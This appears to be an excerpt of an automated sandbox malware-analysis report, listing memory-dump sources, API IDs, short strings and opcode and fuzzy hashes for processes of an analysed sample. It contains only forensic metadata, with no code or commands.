                                                                                                                                                                                                  • String ID: -H
                                                                                                                                                                                                  • API String ID: 0-3863854644
                                                                                                                                                                                                  • Opcode ID: d70cd073b5f691afd6a3fbe8f9c60a564221b497f4c716334c6fd6902f4a1b7b
                                                                                                                                                                                                  • Instruction ID: f2d37142b1c3e316729874b60b759f954fa2aabbd918fb68ad29d0553fe92688
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d70cd073b5f691afd6a3fbe8f9c60a564221b497f4c716334c6fd6902f4a1b7b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BB1C03090CA5D8FDB59EB58D885AB8BBF0FF59310F14016EC04DC72A2DB39A846CB45

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 338 7ff848f25773-7ff848f27050 342 7ff848f2706c-7ff848f270ca LoadLibraryExW 338->342 343 7ff848f27052-7ff848f27069 338->343 344 7ff848f270cc 342->344 345 7ff848f270d2-7ff848f27124 342->345 343->342 344->345
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000028.00000002.2642705866.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_40_2_7ff848f20000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                  • Opcode ID: dc2e4a9722c295b5ad242a23f825614df0ecba72c1d4ca167f386fe092e8167e
                                                                                                                                                                                                  • Instruction ID: dd6203718791b4aa07659a5127b89fe56e4fbf48e75930f0e129fcd2cdba3dac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2e4a9722c295b5ad242a23f825614df0ecba72c1d4ca167f386fe092e8167e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84510970908A1C8FDB98EF98D889BE9BBF1FB69311F10416ED00DE7651DB75A885CB40
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: dwq
                                                                                                                                                                                                  • API String ID: 0-1204298229
                                                                                                                                                                                                  • Opcode ID: 41edcb42aaec2ccf4402b51cda41e374e234b16e0a430936e101390c898a0189
                                                                                                                                                                                                  • Instruction ID: 4345560854dc7b284cb39311c83728fd8b2a1e4619a53b4daa980c47843b9f35
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41edcb42aaec2ccf4402b51cda41e374e234b16e0a430936e101390c898a0189
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C829274E00229CFCB25DFA8D894BDDB7B5BF49304F1085AAD509AB365DB30AA85CF50
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 7cc1b5c28d3ac1f9e2faceb2cfeb423bc060b63ec014304bfc92c586634fd18d
                                                                                                                                                                                                  • Instruction ID: b278adaee8eac155dd6da9f184e50c9b748205303d398dc5565e2f341ab5ba9c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc1b5c28d3ac1f9e2faceb2cfeb423bc060b63ec014304bfc92c586634fd18d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B43164B0900205DFCB06EFE4E894A9D7FF1FB45308F40599AD004AB276EB755A4AEF81
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 083756cb603584b48372dbfa8e9c2cc85a87342410ea884a79796aae7666f8d4
                                                                                                                                                                                                  • Instruction ID: fb8422f85f436ca9bf21638bc99ee8b3f03ad0326d60eb4d00404df01aee30f4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 083756cb603584b48372dbfa8e9c2cc85a87342410ea884a79796aae7666f8d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3821E570910209DFCF45FFE8E484A9D7BF1FB44308F405959D015AB265EB715A4AEF81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a0faff2e4bd31b6723715310d6145978d5cff6c715353859061bc6eeba63df44
                                                                                                                                                                                                  • Instruction ID: c7ef24471ec4e00debdd78d43711e103ec36ae54edd9bbd4df3fcfef15cf9673
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0faff2e4bd31b6723715310d6145978d5cff6c715353859061bc6eeba63df44
• Instruction Fuzzy Hash: B9212871D0015A9FCF01DFA9D4909EDBBB1EF49310F8586AAD461BB262DB30A94ACF50
Memory Dump Source
• Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cad2a47c41a1203b5e36e9af4718302ece998e39559b2eab765012698671d086
• Instruction ID: 10c291490fbf649ac3d4766f8fa43df30033340a056da9df4131826c674bbbc1
• Opcode Fuzzy Hash: cad2a47c41a1203b5e36e9af4718302ece998e39559b2eab765012698671d086
• Instruction Fuzzy Hash: 7FF064B4C082898ACF11CFA6D0543EEBBB4AB8D300F00942AC594BB241D7380A4ACFA5
Memory Dump Source
• Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7544cec17d973d816e779d60fa9953070b743a5db4c840d2a28c2a505444d57a
• Instruction ID: 6a8e91f056d43160123e71541ebf47061d17104a82693418eecf58fe1604993f
• Opcode Fuzzy Hash: 7544cec17d973d816e779d60fa9953070b743a5db4c840d2a28c2a505444d57a
• Instruction Fuzzy Hash: 3F01C470C05259DFCB06EFF8D45499DBFB0AF0A204F144AEAC855AB261EB709A44DB81
Memory Dump Source
• Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bfc953536c7315b42c5697f0681be25d10202bd055a7da7a1a8ba5d98ba8fc1b
• Instruction ID: f41911c025b872286eb2bc2e40d521a841f5643121689c0d6a11ed4ba147324f
• Opcode Fuzzy Hash: bfc953536c7315b42c5697f0681be25d10202bd055a7da7a1a8ba5d98ba8fc1b
• Instruction Fuzzy Hash: BBF0B270C00219DFCB45EFB8D544AEEBBB4FF05304F104AAAC815AB250EB719A44DF81
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: (hr$(hr$(hr$(hr$(hr$(hr
• API String ID: 0-431374215
• Opcode ID: b747062013b38f9b6f317cac32e03888fe9eb846c6bd6cef0b513d5f9d30fe1c
• Instruction ID: db70317dd841ede8d618a82ed9b4b4fff9fae76634d5c195353a26e2c3db87c7
• Opcode Fuzzy Hash: b747062013b38f9b6f317cac32e03888fe9eb846c6bd6cef0b513d5f9d30fe1c
• Instruction Fuzzy Hash: AE62AD74A01229CFCB24CF69C984BD9BBF5BF4A300F5082A9D449AB365D734AE85CF51
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: (hr$(hr$(hr
• API String ID: 0-1014567274
• Opcode ID: bfc305bc9ab3bf27df473021ccb215534a18e337b433f6321141073f0f5782b7
• Instruction ID: 8b7582f34150e5b1db6e4bd5071d1594185cf920a6838c8382174bece39077a3
• Opcode Fuzzy Hash: bfc305bc9ab3bf27df473021ccb215534a18e337b433f6321141073f0f5782b7
• Instruction Fuzzy Hash: 6622AC74E10219CFDB54CFA9C884B9DFBB9BF49310F14929AE818AB361D770A985CF40
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: (hr$(hr$(hr
• API String ID: 0-1014567274
• Opcode ID: 92d5e32787c6df6df2e0b1009ead3b8a3606944d98c0eb3e6b5c6637d96dcd82
• Instruction ID: d0a9b063cce1ddaa3ccda1e6e200cb1ba2dde8ef89c59ab872dceb4b9a5fff83
• Opcode Fuzzy Hash: 92d5e32787c6df6df2e0b1009ead3b8a3606944d98c0eb3e6b5c6637d96dcd82
• Instruction Fuzzy Hash: 27229F74A012298FCB24CF69C984BD9BBF1BF4A300F5482E9D449AB365D774AE85CF41
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: dwq
• API String ID: 0-1204298229
• Opcode ID: e947e9ef322846ee4a4a4df7becbd003efc5540aa1c9c25ef5625909a4c49e54
• Instruction ID: 08d21781c19f5ab76b7f5dc6eb8aaa05786c538f04cb99d7f3f550bd9bc2c903
• Opcode Fuzzy Hash: e947e9ef322846ee4a4a4df7becbd003efc5540aa1c9c25ef5625909a4c49e54
• Instruction Fuzzy Hash: 2F82A174A102298FCB24CF69D884BDDBBB5FF49300F1095EAD409AB265DB74AE85CF50
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: (wq
• API String ID: 0-1062398946
• Opcode ID: 76dbafd9f8ea5a8170435b77c315e946f1317706fa42b3f6dcbbb0bca461c062
• Instruction ID: c3b21c2d8c9f523efda37b8c4a32917095dda797574200973ae3b1c0e5a5dd6e
• Opcode Fuzzy Hash: 76dbafd9f8ea5a8170435b77c315e946f1317706fa42b3f6dcbbb0bca461c062
• Instruction Fuzzy Hash: 8CE1F274A10218CFDB58DFA9C994A9DBBF2FF89300F208569D405AB365DB35AD82CF50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6d0deb625b07bc363a3f81bed08b3e3c0bb8a902211dbd1540edc2d514db793
• Instruction ID: 6e69695636906e7a5077017eb3ba39d8e7bec4e7ea5f4d76390a97e2b059cc3e
• Opcode Fuzzy Hash: e6d0deb625b07bc363a3f81bed08b3e3c0bb8a902211dbd1540edc2d514db793
• Instruction Fuzzy Hash: 9F12B374E10229CFCB24CF69D884BDDBBB5FF49304F108296D409AB265DB74AA85CF50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e1e4c80459258f7d1aea7df88ec0c61a6bc4a45645974043bc1b6ee691bdbec
• Instruction ID: 44372d83f7b283af57e179d2b5d6320e1a387bdba03526329fb1bcfad7d0bcf7
• Opcode Fuzzy Hash: 9e1e4c80459258f7d1aea7df88ec0c61a6bc4a45645974043bc1b6ee691bdbec
• Instruction Fuzzy Hash: 9AB19F75E103198FCB14DFA9C984ADDBBF1BF49310F2591A9E409AB365D730AA85CF80
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: (hr$(hr
• API String ID: 0-2207020532
• Opcode ID: ec0afb7dd9779bc40ded6528b4dc8c5bc55e9a8ba1a6ac38e656f8720817c5ad
• Instruction ID: a07da7b5c8c1e4c0f38f764e74e19cda3cdeeed12582868ff68ea6996e0368fc
• Opcode Fuzzy Hash: ec0afb7dd9779bc40ded6528b4dc8c5bc55e9a8ba1a6ac38e656f8720817c5ad
• Instruction Fuzzy Hash: 08319174E002098FDB18DFA9C9809DDBBF5BF89314F20916AD419AB355D730A985CF50
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID: htq$htq
• API String ID: 0-2321306706
                                                                                                                                                                                                  • Opcode ID: e9f1008c6b1e01a84a52a58d2e89f9a318a7067f0da4aa319ac3d11eec2cd452
                                                                                                                                                                                                  • Instruction ID: c1d17a646a765d9c65270bd9f4a9a148ed181554a9695f585055b9279220ae9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9f1008c6b1e01a84a52a58d2e89f9a318a7067f0da4aa319ac3d11eec2cd452
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE21F6B4E0012A9FCF05DFA8D9409EDBBB5FF89310F51865AD414BB391DB30A906CB90
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: htq$htq
                                                                                                                                                                                                  • API String ID: 0-2321306706
                                                                                                                                                                                                  • Opcode ID: 44fded9701e4a7818880102996597f1d5e7bd9138363106d4efb0d5fdaa65d31
                                                                                                                                                                                                  • Instruction ID: c6a1dd8575c0bbeca47f297bf0977c502306d397cda271cfc97a6bb75faf3257
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44fded9701e4a7818880102996597f1d5e7bd9138363106d4efb0d5fdaa65d31
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C72139B4E0025A9FCF06DFA8CA409DDBBF5EF49310F01829AD455BB291DB30A946CF91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: 049174216ed87dc3ddc4514e533606c6b15cbabf72c2c3594d2b5df7f7f3f49a
                                                                                                                                                                                                  • Instruction ID: ad613e0215b890357fac9451630c7e0151c42c48a9cb2738d195017b05dc5b29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 049174216ed87dc3ddc4514e533606c6b15cbabf72c2c3594d2b5df7f7f3f49a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52E1A074E00219CFDB14CFA8C984A9DFBF5BF49300F149299E819AB369D770A986CF40
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: 7b943fc9a490f30b3ac4d6dc53a60e7f6423f68bb179a436cb5ea7a660572ffd
                                                                                                                                                                                                  • Instruction ID: 475349b62083cdfc907e5431f34134c4d0d840e42a5a7cdf93a82a500bb072bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b943fc9a490f30b3ac4d6dc53a60e7f6423f68bb179a436cb5ea7a660572ffd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE19074E00219CFDB54CFA8C984A9DFBF2BF49300F159199E819AB369D770A986CF50
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: bc757dbb58106d6d0d7c741837271c47d984e84caa30400cc4a3c24cd605da48
                                                                                                                                                                                                  • Instruction ID: 5058957cba20bddfe646e1b01e2e0aac15c7bf3d307fc94f026c744697199fb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc757dbb58106d6d0d7c741837271c47d984e84caa30400cc4a3c24cd605da48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B591E574A01218CFDB19DFB8D994A9DBBB2FF89300F208569D405AB365DB35AD82CF50
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: htq
                                                                                                                                                                                                  • API String ID: 0-455586381
                                                                                                                                                                                                  • Opcode ID: 192debe0a8c6cd482d9e996c160fa10e8f7f425333fc9df59c2d548c665befd6
                                                                                                                                                                                                  • Instruction ID: fb8ca5e108b77bd388727c871e6ebc068bdab3e24f1404fd1ce28990e35e01bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 192debe0a8c6cd482d9e996c160fa10e8f7f425333fc9df59c2d548c665befd6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF512874E003199FCB14DFA9C980ADDFBF1FF89310F119595D458AB261DB30AA86CB80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 20faf447bf179947ef7aa52a50e215cfaea5794139599c9d71b0804d740f0a3a
                                                                                                                                                                                                  • Instruction ID: 4fbe1217abe555286b4d0b36962faafd440eec863b0ff5f8b7831fa5e978ca62
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20faf447bf179947ef7aa52a50e215cfaea5794139599c9d71b0804d740f0a3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C92171B0A0020ADFCB05EFACFD8468DBBB5FB84304F009699D004AB251EB745E46DF81
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: bd8226935da96ddbfce193cf24907e3c449ea7d2fb42357fc2f02ede82bd0758
                                                                                                                                                                                                  • Instruction ID: ecde3423ee5b07d4dac8be5d83691e3b4f0ea7b2ed34d75d27de39bd44306dad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8226935da96ddbfce193cf24907e3c449ea7d2fb42357fc2f02ede82bd0758
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B2132B4A0020ADFCB04EFACFD8469DBBB5FB84304F009A99D405AB255DB745E45DF91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9e5056c60e8f3c2572b1a4a7fd8ab8dd8dca6df3e7332e54ac16389dbd9ff926
                                                                                                                                                                                                  • Instruction ID: 4b293724c597f2bbba299e8f1fe23c94d495fc8b0892f25429b161e64ec3f3e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5056c60e8f3c2572b1a4a7fd8ab8dd8dca6df3e7332e54ac16389dbd9ff926
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B51DDB4D042599FCF10CFAAD980A9EFFB1AF49300F24902AE918BB250D7349A85CF54
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
• API String ID:
• Opcode ID: 93bec15fa88df90843ab2dac5baed9fe9f158c67c68e280e2514a9e43c00d11c
• Instruction ID: 58eb43386e4cdda171a05ae23e0ffb6408752ca21b08187357ff6ce3ad3f12a1
• Opcode Fuzzy Hash: 93bec15fa88df90843ab2dac5baed9fe9f158c67c68e280e2514a9e43c00d11c
• Instruction Fuzzy Hash: 34A19374A102298FCB24CFA9D884BDDBBB5FF49300F1092D6D409AB355DB74AA85CF50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a5517db3078122fa6491836e25302c8090973d1e672f77fccf9ee7cc869d4861
• Instruction ID: e77c246bff1ce48168b5691766519b0a988a14de63b247ab8030e9fd910e7cde
• Opcode Fuzzy Hash: a5517db3078122fa6491836e25302c8090973d1e672f77fccf9ee7cc869d4861
• Instruction Fuzzy Hash: B191D474A01218CFCB18DFB9D994A9DBBB2FF89300F209569D405AB365DB35AD82CF50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 407947524a02ef97533101e745eb0944d5aac4d5253663e9f4c742518d8c7781
• Instruction ID: d433f12ddd8d5c3f56334afbebd9e73b24a6d7d90b637d999ea6de56dea14cc9
• Opcode Fuzzy Hash: 407947524a02ef97533101e745eb0944d5aac4d5253663e9f4c742518d8c7781
• Instruction Fuzzy Hash: 0A61E278E11228DFCB08CFA9C8849DDBBF6FF89310F149169E505AB365DB74A942CB50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f8a9549baae151d207870549ffb7f4ad52aae2ba2f4da0b3bcb1a58e1fea514
• Instruction ID: 83a669a7802ca47fb37c407517df4c3d98e93fdfd369cf4be5ff8fed087f37b5
• Opcode Fuzzy Hash: 4f8a9549baae151d207870549ffb7f4ad52aae2ba2f4da0b3bcb1a58e1fea514
• Instruction Fuzzy Hash: 3A41CCB4D00259DFDF10CFAAD984A9EFFB1AF49300F24902AE918BB254DB749985CF54
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e26c264693b2bd9405fbbd5a75f37e45fd530e65a044f7a58d5310ab2c75371
• Instruction ID: 54b35130e9f993810257ffbab2e99a2cfc1daad095e7a09a526c1afa3a8588a2
• Opcode Fuzzy Hash: 5e26c264693b2bd9405fbbd5a75f37e45fd530e65a044f7a58d5310ab2c75371
• Instruction Fuzzy Hash: CB510474E11219DFCB04CFA8D884AEDBBB5FF49310F18916AD505AB325D734AD86CB50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0bad5403487eb8b873f615ac86f279ecd488319d0d6d50166ae3e48fe0457f5
• Instruction ID: 5e5162bc81cbc653843733345e4241672e6f11d75d94f766af5e869f2249aa44
• Opcode Fuzzy Hash: d0bad5403487eb8b873f615ac86f279ecd488319d0d6d50166ae3e48fe0457f5
• Instruction Fuzzy Hash: 52510475E11219DFCF08CFA8C8849DDBBB6FF89310F189169E505AB325DB34A986CB50
Memory Dump Source
• Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_3220000_manager.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8172b2879b85e1907920abf484c56cfe9c76e2cf5bda70e28f5d690f7c588d51
• Instruction ID: 5d7f82028378a9945b84cb7d1f578501635096c310cd376f5340071d844527bb
• Opcode Fuzzy Hash: 8172b2879b85e1907920abf484c56cfe9c76e2cf5bda70e28f5d690f7c588d51
• Instruction Fuzzy Hash: 39310874E0011A9FCF05DFA8D9809DDBBB5FF89300B118696D814BB355D730AA46CF91
Memory Dump Source
